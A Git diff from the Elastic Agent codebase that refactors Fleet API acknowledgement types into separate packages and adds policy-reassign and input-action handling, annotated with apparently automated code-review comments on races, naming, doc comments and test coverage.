diff --git a/x-pack/elastic-agent/pkg/fleetapi/ack_cmd_test.go b/x-pack/elastic-agent/pkg/fleetapi/ack_cmd_test.go index 1f1bfdb21eb..e384ced92a1 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/ack_cmd_test.go +++ b/x-pack/elastic-agent/pkg/fleetapi/ack_cmd_test.go @@ -12,6 +12,8 @@ import ( "testing" "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" ) func TestAck(t *testing.T) { @@ -41,11 +43,11 @@ func TestAck(t *testing.T) { id := responses.Events[0].ActionID require.Equal(t, "my-id", id) - fmt.Fprintf(w, raw) + fmt.Fprint(w, raw) }, withAPIKey)) return mux }, withAPIKey, - func(t *testing.T, client clienter) { + func(t *testing.T, client client.Sender) { action := &ActionPolicyChange{ ActionID: "my-id", ActionType: "POLICY_CHANGE", diff --git a/x-pack/elastic-agent/pkg/fleetapi/acker/acker.go b/x-pack/elastic-agent/pkg/fleetapi/acker/acker.go new file mode 100644 index 00000000000..9cdb54a48bd --- /dev/null +++ b/x-pack/elastic-agent/pkg/fleetapi/acker/acker.go @@ -0,0 +1,17 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package acker + +import ( + "context" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +// Acker is an acker of actions to fleet. +type Acker interface { + Ack(ctx context.Context, action fleetapi.Action) error + Commit(ctx context.Context) error +} diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_acker.go b/x-pack/elastic-agent/pkg/fleetapi/acker/fleet/fleet_acker.go similarity index 67% rename from x-pack/elastic-agent/pkg/agent/application/fleet_acker.go rename to x-pack/elastic-agent/pkg/fleetapi/acker/fleet/fleet_acker.go index dac05d0c3a0..cebf49b027f 100644 --- a/x-pack/elastic-agent/pkg/agent/application/fleet_acker.go 
+++ b/x-pack/elastic-agent/pkg/fleetapi/acker/fleet/fleet_acker.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package fleet import ( "context" @@ -13,38 +13,42 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/scheduler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" ) const fleetTimeFormat = "2006-01-02T15:04:05.99999-07:00" -type actionAcker struct { - log *logger.Logger - dispatcher dispatcher - client clienter - scheduler scheduler.Scheduler - agentInfo agentInfo - reporter fleetReporter - done chan struct{} +type agentInfo interface { + AgentID() string } -func newActionAcker( +// Acker is acker capable of acking action in fleet. +type Acker struct { + log *logger.Logger + client client.Sender + agentInfo agentInfo +} + +// NewAcker creates a new fleet acker. +func NewAcker( log *logger.Logger, agentInfo agentInfo, - client clienter, -) (*actionAcker, error) { - return &actionAcker{ + client client.Sender, +) (*Acker, error) { + return &Acker{ log: log, client: client, agentInfo: agentInfo, }, nil } -func (f *actionAcker) SetClient(client clienter) { - f.client = client +// SetClient sets client to be used for http communication. +func (f *Acker) SetClient(c client.Sender) { + f.client = c } -func (f *actionAcker) Ack(ctx context.Context, action fleetapi.Action) error { +// Ack acknowledges action. +func (f *Acker) Ack(ctx context.Context, action fleetapi.Action) error { // checkin agentID := f.agentInfo.AgentID() cmd := fleetapi.NewAckCmd(f.agentInfo, f.client) 
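Review bot: SetClient assigns `f.client` with no synchronisation while Ack reads it in `fleetapi.NewAckCmd(f.agentInfo, f.client)`, so a client swap that overlaps an in-flight ack would be a data race; whether that can happen depends on callers outside this hunk. Now that Acker is exported, the doc comment should state the expectation, for example `// SetClient sets the client used for HTTP communication; it must not be called concurrently with Ack.`, or the field should be guarded by a mutex. NewAcker always returns a nil error, which its comment could mention so callers know the check is a formality. Ack's body continues in the next hunk.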
@@ -64,7 +68,8 @@ func (f *actionAcker) Ack(ctx context.Context, action fleetapi.Action) error { return nil } -func (f *actionAcker) AckBatch(ctx context.Context, actions []fleetapi.Action) error { +// AckBatch acknowledges multiple actions at once. +func (f *Acker) AckBatch(ctx context.Context, actions []fleetapi.Action) error { // checkin agentID := f.agentInfo.AgentID() events := make([]fleetapi.AckEvent, 0, len(actions)) @@ -88,12 +93,13 @@ func (f *actionAcker) AckBatch(ctx context.Context, actions []fleetapi.Action) e return nil } -func (f *actionAcker) Commit(ctx context.Context) error { +// Commit commits ack actions. +func (f *Acker) Commit(ctx context.Context) error { return nil } func constructEvent(action fleetapi.Action, agentID string) fleetapi.AckEvent { - return fleetapi.AckEvent{ + ackev := fleetapi.AckEvent{ EventType: "ACTION_RESULT", SubType: "ACKNOWLEDGED", Timestamp: time.Now().Format(fleetTimeFormat), @@ -101,19 +107,12 @@ func constructEvent(action fleetapi.Action, agentID string) fleetapi.AckEvent { AgentID: agentID, Message: fmt.Sprintf("Action '%s' of type '%s' acknowledged.", action.ID(), action.Type()), } -} - -type noopAcker struct{} - -func newNoopAcker() *noopAcker { - return &noopAcker{} -} -func (f *noopAcker) Ack(ctx context.Context, action fleetapi.Action) error { - return nil + if a, ok := action.(*fleetapi.ActionApp); ok { + ackev.ActionData = a.Data + ackev.StartedAt = a.StartedAt + ackev.CompletedAt = a.CompletedAt + ackev.Error = a.Error + } + return ackev } - -func (*noopAcker) Commit(ctx context.Context) error { return nil } - -var _ fleetAcker = &actionAcker{} -var _ fleetAcker = &noopAcker{} 
diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_acker_test.go b/x-pack/elastic-agent/pkg/fleetapi/acker/fleet/fleet_acker_test.go similarity index 51% rename from x-pack/elastic-agent/pkg/agent/application/fleet_acker_test.go rename to x-pack/elastic-agent/pkg/fleetapi/acker/fleet/fleet_acker_test.go index 41e42df7376..4facc9c63ed 100644 --- a/x-pack/elastic-agent/pkg/agent/application/fleet_acker_test.go +++ b/x-pack/elastic-agent/pkg/fleetapi/acker/fleet/fleet_acker_test.go @@ -2,14 +2,18 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package fleet import ( + "bytes" "context" "encoding/json" + "fmt" "io" "io/ioutil" "net/http" + "net/url" + "sync" "testing" "github.com/stretchr/testify/assert" @@ -23,10 +27,10 @@ func TestAcker(t *testing.T) { Events []fleetapi.AckEvent `json:"events"` } - log, _ := logger.New("fleet_acker") + log, _ := logger.New("fleet_acker", false) client := newTestingClient() agentInfo := &testAgentInfo{} - acker, err := newActionAcker(log, agentInfo, client) + acker, err := NewAcker(log, agentInfo, client) if err != nil { t.Fatal(err) } 
@@ -64,3 +68,57 @@ func TestAcker(t *testing.T) { t.Fatal(err) } } + +type clientCallbackFunc func(headers http.Header, body io.Reader) (*http.Response, error) + +type testingClient struct { + sync.Mutex + callback clientCallbackFunc + received chan struct{} +} + +func (t *testingClient) Send( + _ context.Context, + method string, + path string, + params url.Values, + headers http.Header, + body io.Reader, +) (*http.Response, error) { + t.Lock() + defer t.Unlock() + defer func() { t.received <- struct{}{} }() + return t.callback(headers, body) +} + +func (t *testingClient) URI() string { + return "http://localhost" +} + +func (t *testingClient) Answer(fn clientCallbackFunc) <-chan struct{} { + t.Lock() + defer t.Unlock() + t.callback = fn + return t.received +} + +func newTestingClient() *testingClient { + return &testingClient{received: make(chan struct{}, 1)} +} + +type testAgentInfo struct{} + +func (testAgentInfo) AgentID() string { return "agent-secret" } + +func wrapStrToResp(code int, body string) *http.Response { + return &http.Response{ + Status: fmt.Sprintf("%d %s", code, http.StatusText(code)), + StatusCode: code, + Proto: "HTTP/1.1", + ProtoMajor: 1, + ProtoMinor: 1, + Body: ioutil.NopCloser(bytes.NewBufferString(body)), + ContentLength: int64(len(body)), + Header: make(http.Header), + } +} diff --git a/x-pack/elastic-agent/pkg/agent/application/lazy_acker.go b/x-pack/elastic-agent/pkg/fleetapi/acker/lazy/lazy_acker.go similarity index 71% rename from x-pack/elastic-agent/pkg/agent/application/lazy_acker.go rename to x-pack/elastic-agent/pkg/fleetapi/acker/lazy/lazy_acker.go index 4a4004e028f..39f6fb5cd30 100644 --- a/x-pack/elastic-agent/pkg/agent/application/lazy_acker.go +++ b/x-pack/elastic-agent/pkg/fleetapi/acker/lazy/lazy_acker.go 
@@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package lazy import ( "context" @@ -19,21 +19,24 @@ type ackForcer interface { ForceAck() } -type lazyAcker struct { +// Acker is a lazy acker which performs HTTP communication on commit. +type Acker struct { log *logger.Logger acker batchAcker queue []fleetapi.Action } -func newLazyAcker(baseAcker batchAcker, log *logger.Logger) *lazyAcker { - return &lazyAcker{ +// NewAcker creates a new lazy acker. +func NewAcker(baseAcker batchAcker, log *logger.Logger) *Acker { + return &Acker{ acker: baseAcker, queue: make([]fleetapi.Action, 0), log: log, } } -func (f *lazyAcker) Ack(ctx context.Context, action fleetapi.Action) error { +// Ack acknowledges action. +func (f *Acker) Ack(ctx context.Context, action fleetapi.Action) error { f.queue = append(f.queue, action) f.log.Debugf("appending action with id '%s' to the queue", action.ID()) @@ -44,7 +47,8 @@ func (f *lazyAcker) Ack(ctx context.Context, action fleetapi.Action) error { return nil } -func (f *lazyAcker) Commit(ctx context.Context) error { +// Commit commits ack actions. +func (f *Acker) Commit(ctx context.Context) error { err := f.acker.AckBatch(ctx, f.queue) if err != nil { // do not cleanup on error @@ -54,5 +58,3 @@ func (f *lazyAcker) Commit(ctx context.Context) error { f.queue = make([]fleetapi.Action, 0) return nil } - -var _ fleetAcker = &lazyAcker{} diff --git a/x-pack/elastic-agent/pkg/agent/application/lazy_acker_test.go b/x-pack/elastic-agent/pkg/fleetapi/acker/lazy/lazy_acker_test.go similarity index 64% rename from x-pack/elastic-agent/pkg/agent/application/lazy_acker_test.go rename to x-pack/elastic-agent/pkg/fleetapi/acker/lazy/lazy_acker_test.go index b3d872d4946..1e34d303bc5 100644 --- a/x-pack/elastic-agent/pkg/agent/application/lazy_acker_test.go 
+++ b/x-pack/elastic-agent/pkg/fleetapi/acker/lazy/lazy_acker_test.go @@ -2,21 +2,26 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package lazy import ( + "bytes" "context" "encoding/json" + "fmt" "io" "io/ioutil" "net/http" + "net/url" "strings" + "sync" "testing" "github.com/stretchr/testify/assert" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/acker/fleet" ) func TestLazyAcker(t *testing.T) { @@ -24,15 +29,15 @@ func TestLazyAcker(t *testing.T) { Events []fleetapi.AckEvent `json:"events"` } - log, _ := logger.New("") + log, _ := logger.New("", false) client := newTestingClient() agentInfo := &testAgentInfo{} - acker, err := newActionAcker(log, agentInfo, client) + acker, err := fleet.NewAcker(log, agentInfo, client) if err != nil { t.Fatal(err) } - lacker := newLazyAcker(acker, log) + lacker := NewAcker(acker, log) if acker == nil { t.Fatal("acker not initialized") 
@@ -122,3 +127,57 @@ func (a *actionImmediate) String() string { func (a *actionImmediate) OriginalType() string { return a.originalType } + +type clientCallbackFunc func(headers http.Header, body io.Reader) (*http.Response, error) + +type testingClient struct { + sync.Mutex + callback clientCallbackFunc + received chan struct{} +} + +func (t *testingClient) Send( + _ context.Context, + method string, + path string, + params url.Values, + headers http.Header, + body io.Reader, +) (*http.Response, error) { + t.Lock() + defer t.Unlock() + defer func() { t.received <- struct{}{} }() + return t.callback(headers, body) +} + +func (t *testingClient) URI() string { + return "http://localhost" +} + +func (t *testingClient) Answer(fn clientCallbackFunc) <-chan struct{} { + t.Lock() + defer t.Unlock() + t.callback = fn + return t.received +} + +func newTestingClient() *testingClient { + return &testingClient{received: make(chan struct{}, 1)} +} + +type testAgentInfo struct{} + +func (testAgentInfo) AgentID() string { return "agent-secret" } + +func wrapStrToResp(code int, body string) *http.Response { + return &http.Response{ + Status: fmt.Sprintf("%d %s", code, http.StatusText(code)), + StatusCode: code, + Proto: "HTTP/1.1", + ProtoMajor: 1, + ProtoMinor: 1, + Body: ioutil.NopCloser(bytes.NewBufferString(body)), + ContentLength: int64(len(body)), + Header: make(http.Header), + } +} diff --git a/x-pack/elastic-agent/pkg/fleetapi/acker/noop/noop_acker.go b/x-pack/elastic-agent/pkg/fleetapi/acker/noop/noop_acker.go new file mode 100644 index 00000000000..05b9ed5e9b5 --- /dev/null +++ b/x-pack/elastic-agent/pkg/fleetapi/acker/noop/noop_acker.go 
@@ -0,0 +1,28 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package fleet + +import ( + "context" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +// Acker is a noop acker. +// Methods of these acker do nothing. +type Acker struct{} + +// NewAcker creates a new noop acker. +func NewAcker() *Acker { + return &Acker{} +} + +// Ack acknowledges action. +func (f *Acker) Ack(ctx context.Context, action fleetapi.Action) error { + return nil +} + +// Commit commits ack actions. +func (*Acker) Commit(ctx context.Context) error { return nil } diff --git a/x-pack/elastic-agent/pkg/fleetapi/action.go b/x-pack/elastic-agent/pkg/fleetapi/action.go index d836aa801c2..9aabdd30371 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/action.go +++ b/x-pack/elastic-agent/pkg/fleetapi/action.go @@ -9,6 +9,8 @@ import ( "fmt" "strings" + "github.com/mitchellh/mapstructure" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" ) @@ -19,10 +21,12 @@ const ( ActionTypeUnenroll = "UNENROLL" // ActionTypePolicyChange specifies policy change action. ActionTypePolicyChange = "POLICY_CHANGE" + // ActionTypePolicyReassign specifies policy reassign action. + ActionTypePolicyReassign = "POLICY_REASSIGN" // ActionTypeSettings specifies change of agent settings. ActionTypeSettings = "SETTINGS" - // ActionTypeApplication specifies agent action. - ActionTypeApplication = "APP_ACTION" + // ActionTypeInputAction specifies agent action. + ActionTypeInputAction = "INPUT_ACTION" ) // Action base interface for all the implemented action from the fleet API. 
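Review bot: The new file sits under `acker/noop/` but declares `package fleet`, the same name as the package in `acker/fleet/`, so importers have to alias it and a reader cannot tell the two Acker types apart by package name. `package noop` would match the directory and the sibling `lazy` package. The commit also drops the `var _ fleetAcker = ...` assertions from the old files; a compile-time check against the new interface, along the lines of `var _ acker.Acker = (*Acker)(nil)`, would keep that guarantee if the import does not create a cycle. The receivers are written `(f *Acker)` on Ack and `(*Acker)` on Commit, and using one form for both would be more consistent.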
@@ -70,6 +74,31 @@ func (a *ActionUnknown) OriginalType() string { return a.originalType } +// ActionPolicyReassign is a request to apply a new +type ActionPolicyReassign struct { + ActionID string + ActionType string +} + +func (a *ActionPolicyReassign) String() string { + var s strings.Builder + s.WriteString("action_id: ") + s.WriteString(a.ActionID) + s.WriteString(", type: ") + s.WriteString(a.ActionType) + return s.String() +} + +// Type returns the type of the Action. +func (a *ActionPolicyReassign) Type() string { + return a.ActionType +} + +// ID returns the ID of the Action. +func (a *ActionPolicyReassign) ID() string { + return a.ActionID +} + // ActionPolicyChange is a request to apply a new type ActionPolicyChange struct { ActionID string @@ -179,10 +208,13 @@ func (a *ActionSettings) String() string { // ActionApp is the application action request. type ActionApp struct { - ActionID string - ActionType string - Application string - Data json.RawMessage + ActionID string `json:"id" mapstructure:"id"` + ActionType string `json:"type" mapstructure:"type"` + InputType string `json:"input_type" mapstructure:"input_type"` + Data json.RawMessage `json:"data" mapstructure:"data"` + StartedAt string `json:"started_at,omitempty" mapstructure:"started_at,omitempty"` + CompletedAt string `json:"completed_at,omitempty" mapstructure:"completed_at,omitempty"` + Error string `json:"error,omitempty" mapstructure:"error,omitempty"` } func (a *ActionApp) String() string { @@ -191,8 +223,8 @@ func (a *ActionApp) String() string { s.WriteString(a.ActionID) s.WriteString(", type: ") s.WriteString(a.ActionType) - s.WriteString(", application: ") - s.WriteString(a.Application) + s.WriteString(", input_type: ") + s.WriteString(a.InputType) return s.String() } 
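Review bot: The doc comment on ActionPolicyReassign ends mid-sentence (`is a request to apply a new`), apparently copied from ActionPolicyChange just below, which has the same truncation. Something like `// ActionPolicyReassign is a request to reassign the agent to a different policy.` would read properly, provided it matches the fleet semantics. The exported String method has no comment; `// String returns a human-readable description of the action.` fits the style used for Type and ID.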
@@ -206,19 +238,20 @@ func (a *ActionApp) Type() string { return a.ActionType } +// MarshalMap marshals ActionApp into a corresponding map +func (a *ActionApp) MarshalMap() (map[string]interface{}, error) { + var res map[string]interface{} + err := mapstructure.Decode(a, &res) + return res, err +} + // Actions is a list of Actions to executes and allow to unmarshal heterogenous action type. type Actions []Action // UnmarshalJSON takes every raw representation of an action and try to decode them. func (a *Actions) UnmarshalJSON(data []byte) error { - type r struct { - ActionType string `json:"type"` - Application string `json:"application"` - ActionID string `json:"id"` - Data json.RawMessage `json:"data"` - } - var responses []r + var responses []ActionApp if err := json.Unmarshal(data, &responses); err != nil { return errors.New(err, @@ -241,12 +274,17 @@ func (a *Actions) UnmarshalJSON(data []byte) error { "fail to decode POLICY_CHANGE action", errors.TypeConfig) } - case ActionTypeApplication: + case ActionTypePolicyReassign: + action = &ActionPolicyReassign{ + ActionID: response.ActionID, + ActionType: response.ActionType, + } + case ActionTypeInputAction: action = &ActionApp{ - ActionID: response.ActionID, - ActionType: response.ActionType, - Application: response.Application, - Data: response.Data, + ActionID: response.ActionID, + ActionType: response.ActionType, + InputType: response.InputType, + Data: response.Data, } case ActionTypeUnenroll: action = &ActionUnenroll{ diff --git a/x-pack/elastic-agent/pkg/fleetapi/action_test.go b/x-pack/elastic-agent/pkg/fleetapi/action_test.go new file mode 100644 index 00000000000..28e439699a7 --- /dev/null +++ b/x-pack/elastic-agent/pkg/fleetapi/action_test.go 
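Review bot: In the `ActionTypeInputAction` case of UnmarshalJSON, `response.InputType` is copied into the action unchecked, so an INPUT_ACTION that arrives without `input_type` is accepted and presumably only fails later when no application matches it. Rejecting it at decode time gives a clearer failure: add `if response.InputType == "" { ... }` returning an error built with `errors.TypeConfig`, as the POLICY_CHANGE case does for a bad payload. Decoding into `[]ActionApp` also means `started_at`, `completed_at` and `error` are parsed from the server payload and then dropped when the action is rebuilt; a one-line comment saying so would avoid surprise. UnmarshalJSON starts and ends outside this hunk.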
@@ -0,0 +1,82 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package fleetapi + +import ( + "encoding/json" + "testing" + + "github.com/google/go-cmp/cmp" +) + +func TestActionSerialization(t *testing.T) { + a := ActionApp{ + ActionID: "1231232", + ActionType: "APP_INPUT", + InputType: "osquery", + Data: []byte(`{ "foo": "bar" }`), + } + + m, err := a.MarshalMap() + if err != nil { + t.Fatal(err) + } + + diff := cmp.Diff(4, len(m)) + if diff != "" { + t.Error(diff) + } + + diff = cmp.Diff(a.ActionID, mapStringVal(m, "id")) + if diff != "" { + t.Error(diff) + } + + diff = cmp.Diff(a.ActionType, mapStringVal(m, "type")) + if diff != "" { + t.Error(diff) + } + + diff = cmp.Diff(a.InputType, mapStringVal(m, "input_type")) + if diff != "" { + t.Error(diff) + } + + diff = cmp.Diff(a.Data, mapRawMessageVal(m, "data")) + if diff != "" { + t.Error(diff) + } + + diff = cmp.Diff(a.StartedAt, mapStringVal(m, "started_at")) + if diff != "" { + t.Error(diff) + } + diff = cmp.Diff(a.CompletedAt, mapStringVal(m, "completed_at")) + if diff != "" { + t.Error(diff) + } + diff = cmp.Diff(a.Error, mapStringVal(m, "error")) + if diff != "" { + t.Error(diff) + } +} + +func mapStringVal(m map[string]interface{}, key string) string { + if v, ok := m[key]; ok { + if s, ok := v.(string); ok { + return s + } + } + return "" +} + +func mapRawMessageVal(m map[string]interface{}, key string) json.RawMessage { + if v, ok := m[key]; ok { + if res, ok := v.(json.RawMessage); ok { + return res + } + } + return nil +} diff --git a/x-pack/elastic-agent/pkg/fleetapi/checkin_cmd.go b/x-pack/elastic-agent/pkg/fleetapi/checkin_cmd.go index 79bcb39d40b..82f88573e65 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/checkin_cmd.go +++ b/x-pack/elastic-agent/pkg/fleetapi/checkin_cmd.go 
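Review bot: TestActionSerialization sets `ActionType: "APP_INPUT"`, which matches none of the ActionType constants in action.go; using `ActionTypeInputAction` would keep the fixture aligned with what UnmarshalJSON accepts. The test also only covers the case where StartedAt, CompletedAt and Error are empty, so the `omitempty` tags are checked for omission but the populated keys are never asserted. A second case with those three fields set, expecting `len(m) == 7`, would cover MarshalMap's full output.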
@@ -15,6 +15,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" ) const checkingPath = "/api/fleet/agents/%s/checkin" @@ -61,7 +62,7 @@ func (e *CheckinResponse) Validate() error { // CheckinCmd is a fleet API command. type CheckinCmd struct { - client clienter + client client.Sender info agentInfo } @@ -70,7 +71,7 @@ type agentInfo interface { } // NewCheckinCmd creates a new api command. -func NewCheckinCmd(info agentInfo, client clienter) *CheckinCmd { +func NewCheckinCmd(info agentInfo, client client.Sender) *CheckinCmd { return &CheckinCmd{ client: client, info: info, @@ -101,7 +102,7 @@ func (e *CheckinCmd) Execute(ctx context.Context, r *CheckinRequest) (*CheckinRe defer resp.Body.Close() if resp.StatusCode != http.StatusOK { - return nil, extract(resp.Body) + return nil, client.ExtractError(resp.Body) } rs, _ := ioutil.ReadAll(resp.Body) diff --git a/x-pack/elastic-agent/pkg/fleetapi/checkin_cmd_test.go b/x-pack/elastic-agent/pkg/fleetapi/checkin_cmd_test.go index 3e88ed29cd1..86cc814e882 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/checkin_cmd_test.go +++ b/x-pack/elastic-agent/pkg/fleetapi/checkin_cmd_test.go @@ -16,6 +16,7 @@ import ( "github.com/stretchr/testify/require" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" ) type agentinfo struct{} 
@@ -37,11 +38,11 @@ func TestCheckin(t *testing.T) { path := fmt.Sprintf("/api/fleet/agents/%s/checkin", agentInfo.AgentID()) mux.HandleFunc(path, authHandler(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusInternalServerError) - fmt.Fprintf(w, raw) + fmt.Fprint(w, raw) }, withAPIKey)) return mux }, withAPIKey, - func(t *testing.T, client clienter) { + func(t *testing.T, client client.Sender) { cmd := NewCheckinCmd(agentInfo, client) request := CheckinRequest{} @@ -86,11 +87,11 @@ func TestCheckin(t *testing.T) { path := fmt.Sprintf("/api/fleet/agents/%s/checkin", agentInfo.AgentID()) mux.HandleFunc(path, authHandler(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, raw) + fmt.Fprint(w, raw) }, withAPIKey)) return mux }, withAPIKey, - func(t *testing.T, client clienter) { + func(t *testing.T, client client.Sender) { cmd := NewCheckinCmd(agentInfo, client) request := CheckinRequest{} @@ -147,11 +148,11 @@ func TestCheckin(t *testing.T) { path := fmt.Sprintf("/api/fleet/agents/%s/checkin", agentInfo.AgentID()) mux.HandleFunc(path, authHandler(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, raw) + fmt.Fprint(w, raw) }, withAPIKey)) return mux }, withAPIKey, - func(t *testing.T, client clienter) { + func(t *testing.T, client client.Sender) { cmd := NewCheckinCmd(agentInfo, client) request := CheckinRequest{} @@ -179,11 +180,11 @@ func TestCheckin(t *testing.T) { path := fmt.Sprintf("/api/fleet/agents/%s/checkin", agentInfo.AgentID()) mux.HandleFunc(path, authHandler(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, raw) + fmt.Fprint(w, raw) }, withAPIKey)) return mux }, withAPIKey, - func(t *testing.T, client clienter) { + func(t *testing.T, client client.Sender) { cmd := NewCheckinCmd(agentInfo, client) request := CheckinRequest{} 
@@ -213,11 +214,11 @@ func TestCheckin(t *testing.T) { assert.Equal(t, "linux", req.Metadata.OS.Name) w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, raw) + fmt.Fprint(w, raw) }, withAPIKey)) return mux }, withAPIKey, - func(t *testing.T, client clienter) { + func(t *testing.T, client client.Sender) { cmd := NewCheckinCmd(agentInfo, client) request := CheckinRequest{Metadata: testMetadata()} @@ -247,11 +248,11 @@ func TestCheckin(t *testing.T) { assert.Nil(t, req.Metadata) w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, raw) + fmt.Fprint(w, raw) }, withAPIKey)) return mux }, withAPIKey, - func(t *testing.T, client clienter) { + func(t *testing.T, client client.Sender) { cmd := NewCheckinCmd(agentInfo, client) request := CheckinRequest{} diff --git a/x-pack/elastic-agent/pkg/fleetapi/client.go b/x-pack/elastic-agent/pkg/fleetapi/client/client.go similarity index 89% rename from x-pack/elastic-agent/pkg/fleetapi/client.go rename to x-pack/elastic-agent/pkg/fleetapi/client/client.go index c78b0d8ee13..8f9fcd7bc98 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/client.go +++ b/x-pack/elastic-agent/pkg/fleetapi/client/client.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package fleetapi +package client import ( "context" @@ -21,7 +21,8 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) -type clienter interface { +// Sender is an sender interface describing client behavior. +type Sender interface { Send( ctx context.Context, method string, @@ -30,6 +31,8 @@ type clienter interface { headers http.Header, body io.Reader, ) (*http.Response, error) + + URI() string } var baseRoundTrippers = func(rt http.RoundTripper) (http.RoundTripper, error) { 
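Review bot: The new doc comment `// Sender is an sender interface describing client behavior.` in client.go is ungrammatical and says nothing about the added `URI() string` method. `Sender` is now exported and the extra method widens the interface, so every implementation, including test doubles, must provide it and the contract should be written down. A comment such as `// Sender sends HTTP requests to the Fleet API.` plus a one-line comment on `URI()` would be enough. What the returned URI refers to is not visible in this hunk, so confirm that wording against the implementation.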
@@ -47,7 +50,7 @@ func init() { return nil, err } - l, err := logger.New("fleet_client") + l, err := logger.New("fleet_client", false) if err != nil { return nil, errors.New(err, "could not create the logger for debugging HTTP request") } @@ -88,7 +91,8 @@ func NewWithConfig(log *logger.Logger, cfg *kibana.Config) (*kibana.Client, erro return kibana.NewWithConfig(log, cfg, baseRoundTrippers) } -func extract(resp io.Reader) error { +// ExtractError extracts error from a fleet response +func ExtractError(resp io.Reader) error { // Lets try to extract a high level Kibana error. e := &struct { StatusCode int `json:"statusCode"` @@ -106,10 +110,10 @@ func extract(resp io.Reader) error { // System errors doesn't return a message, fleet code can return a Message key which has more // information. if len(e.Message) == 0 { - return fmt.Errorf("Status code: %d, Kibana returned an error: %s", e.StatusCode, e.Error) + return fmt.Errorf("status code: %d, Kibana returned an error: %s", e.StatusCode, e.Error) } return fmt.Errorf( - "Status code: %d, Kibana returned an error: %s, message: %s", + "status code: %d, Kibana returned an error: %s, message: %s", e.StatusCode, e.Error, e.Message, diff --git a/x-pack/elastic-agent/pkg/fleetapi/client_test.go b/x-pack/elastic-agent/pkg/fleetapi/client/client_test.go similarity index 90% rename from x-pack/elastic-agent/pkg/fleetapi/client_test.go rename to x-pack/elastic-agent/pkg/fleetapi/client/client_test.go index 416ff9dcc49..098a314af2a 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/client_test.go +++ b/x-pack/elastic-agent/pkg/fleetapi/client/client_test.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package fleetapi +package client import ( "context" 
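Review bot: `ExtractError` is now exported, and the two `fmt.Errorf` calls at its end copy `e.Error` and `e.Message` from the response into the error string with `%s`. Those fields come from the remote side (Kibana, or whatever answers in front of it), so a caller that logs the error writes server-controlled text, including any newlines, into its logs. The doc comment should say so, for example `// ExtractError builds an error from a Fleet/Kibana error response; the message contains text taken from the response body and must be treated as untrusted.` Using `%q` instead of `%s` for the two string fields would also keep control characters out of log lines. The middle of the function lies outside these hunks, so how much of the body is read cannot be judged from here.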
